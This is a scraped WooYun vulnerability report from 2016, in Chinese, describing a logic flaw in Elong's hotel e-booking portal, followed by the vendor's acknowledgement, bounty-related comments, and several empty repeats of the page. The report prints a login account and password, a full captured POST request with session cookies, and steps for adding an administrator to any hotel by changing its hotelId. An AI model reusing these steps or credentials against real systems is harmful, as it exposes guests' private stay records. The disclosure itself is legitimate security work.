艺龙某站点严重漏洞可管理艺龙所有酒店/可以任意查看任意酒店开房信息（首页酒店演示）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0212039

漏洞标题：艺龙某站点严重漏洞可管理艺龙所有酒店/可以任意查看任意酒店开房信息（首页酒店演示）

漏洞作者：路人甲

提交时间：2016-05-23 17:08

修复时间：2016-07-07 17:50

公开时间：2016-07-07 17:50

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-23：细节已通知厂商并且等待厂商处理中
2016-05-23：厂商已经确认，细节仅向厂商公开
2016-06-02：细节向核心白帽子及相关领域专家公开
2016-06-12：细节向普通白帽子公开
2016-06-22：细节向实习白帽子公开
2016-07-07：细节向公众公开

简要描述：

首页任意酒店均可！！！！！打雷了

详细说明：

http://ebooking.elong.com/
wangshuai/qwer1111
登陆以后
http://ebooking.elong.com/ebkcommon/dashboard
这里
添加一个用户
然后抓包

POST /ebkauth/userManagement/addUserInfor HTTP/1.1
Host: ebooking.elong.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://ebooking.elong.com/ebkauth/userManagement/userInformation
Content-Length: 322
Cookie: zh_choose=n; EbkSessionId=76fa7b25cac343c8978a12f32554e86f; CookieGuid=54074839-3496-49e9-9e96-d993ce7b4a32; s_fid=245E4CC4B86BA63C-08A294CDF13BD07E; H5CookieId=fe135f4c-cbec-4b5a-a6db-a102617e8d3c; SessionToken=61567e21-3918-480b-b86b-b3deb5fdf1f3622; ShHotel=CityID=0101&CityNameCN=%E5%8C%97%E4%BA%AC%E5%B8%82&CityName=%E5%8C%97%E4%BA%AC%E5%B8%82&OutDate=2016-05-19&CityNameEN=Beijing&InDate=2016-05-18; lastRemind=1463554440038; route=cb2a03a8d3de38616d15d343e36b1cd4; JSESSIONID=39667774809875C15B9C2743EC09559C; viewIntroInfo=1
Connection: close
{"hotelStaff":{"staffName":"çå¸","staffNameEn":"wangshuai9","passWord":"qwer1234","sex":"ç·","email":"","hotelId":"60201251","staffLevel":"1","hotelDept":"0","mobile":"131234xxxxx","singleHotelSign":1,"operator":"çå¸"},"hotelUser":{"operator":"çå¸","ebookingModels":"35,101,102,34,26,27,10,47,39,40,2,4,8,5,1,"}}

每个酒店hotelId对应一个酒店
http://www.elong.com/
首页任意挑选一个酒店
黄山滨江时尚主题酒店(屯溪老街店)
http://hotel.elong.com/huangshan/91097811/
91097811这个就是上面提到的hotelId
我们直接给这个酒店添加管理用户

可能现在已经修复了

漏洞证明：

可能现在已经修复了

修复方案：

可能现在已经修复了

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-05-23 17:43

厂商回复：

尽管这个漏洞上周补天已经报过，我们正在修复中，但安全漏洞是不分平台的，仍然感谢对艺龙安全的帮助。

漏洞评价：

评价

2016-05-23 17:11 | Aasron ( 普通白帽子 | Rank:982 漏洞数:170 | raw_input("你知道我要输入什么？"))

不是eb就是ebook
2016-05-23 17:11 | Aasron ( 普通白帽子 | Rank:982 漏洞数:170 | raw_input("你知道我要输入什么？"))

不是eb就是ebook
2016-05-23 17:13 | DNS ( 普通白帽子 | Rank:803 漏洞数:85 | root@qisec.com)

没用过艺龙
2016-05-23 17:34 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高，标题一定得屌)

让你在补天不发钱！遭雷劈了吧
2016-05-23 17:35 | 偶然 ( 普通白帽子 | Rank:609 漏洞数:142 | 我是天空里一片云。)

应该是艺龙酒店管理系统密码重置漏洞，各种姿势重置
2016-05-23 17:48 | depycode ( 普通白帽子 | Rank:299 漏洞数:53 | 关注网络安全，提高技术！)

5000,3000,2000的漏洞变100块钱收了,艺龙太会玩了。
2016-05-23 17:51 | 换个昵称 ( 路人 | Rank:9 漏洞数:4 | 1)

垃圾厂商，这个洞从5000变2000最后变成100
2016-05-23 17:51 | Tren ( 普通白帽子 | Rank:211 漏洞数:79 | 怎么才能挖到洞，我说主要看气质！)

真会玩-
2016-05-23 17:53 | Ghost丶与狼共舞 ( 普通白帽子 | Rank:1458 漏洞数:288 | G °游走在天堂与地狱的幽灵丶在黯淡的世界...)

有点意思
2016-05-23 17:53 | 中国Cold ( 实习白帽子 | Rank:68 漏洞数:25 | 服重任,行远道,正直而固者,轴也。)

艺龙你这一手玩的6666，给100分
2016-05-23 17:53 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高，标题一定得屌)

原价5000 3000 2000的现在通通100元，100元，你买的了吃亏，买的了上当，走过路过，不要错过
2016-05-23 17:55 | depycode ( 普通白帽子 | Rank:299 漏洞数:53 | 关注网络安全，提高技术！)

这样不尊重白帽子的劳动成果，以后不会有人撸你的洞子。
2016-05-23 18:01 | 红客十年 ( 普通白帽子 | Rank:396 漏洞数:81 | 去年离职富士康，回到家中上蓝翔，蓝翔毕业...)

艺龙你这一手玩的6666，给100分
2016-05-23 18:03 | 无敌情痴 ( 普通白帽子 | Rank:203 漏洞数:61 | 没有站在安全界顶点的能力，但是也要不断的...)

这样不尊重白帽子的劳动成果，以后不会有人撸你的洞子。
2016-05-23 18:07 | 田老板 ( 实习白帽子 | Rank:34 漏洞数:14 | 学校杀手)

这样不尊重白帽子的劳动成果，以后不会有人撸你的洞子。
2016-05-23 18:08 | Rona ( 实习白帽子 | Rank:88 漏洞数:23 | test)

给你们20分的良心厂商，你们还在骂人家。你看看我这些漏洞，有过10分的？
2016-05-23 18:14 | 蓝冰 ( 普通白帽子 | Rank:725 漏洞数:61 | -.-)

@Rona 因为你不知道详情内幕
2016-05-23 19:33 | 田老板 ( 实习白帽子 | Rank:34 漏洞数:14 | 学校杀手)

@Rona 自己看看楼上的回复再说
2016-05-23 19:53 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg？得失乐与悲与Av Qq205655539)

qwq
2016-05-23 20:25 | 中国Cold ( 实习白帽子 | Rank:68 漏洞数:25 | 服重任,行远道,正直而固者,轴也。)

这样不尊重白帽子的劳动成果，以后不会有人撸你的洞子。
2016-05-23 20:47 | zcy ( 实习白帽子 | Rank:93 漏洞数:15 )

补天订的价格吧
2016-05-23 22:20 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 别摸我，我怕热…… | Tr3jer@Gmail.com ...)

@zcy 鸡腿

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0212039

漏洞标题：艺龙某站点严重漏洞可管理艺龙所有酒店/可以任意查看任意酒店开房信息（首页酒店演示）

相关厂商：艺龙旅行网

漏洞作者：路人甲

提交时间：2016-05-23 17:08

修复时间：2016-07-07 17:50

公开时间：2016-07-07 17:50

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0212039

漏洞标题：艺龙某站点严重漏洞可管理艺龙所有酒店/可以任意查看任意酒店开房信息（首页酒店演示）

相关厂商：艺龙旅行网

漏洞作者： 路人甲

提交时间：2016-05-23 17:08

修复时间：2016-07-07 17:50

公开时间：2016-07-07 17:50

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0212039"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云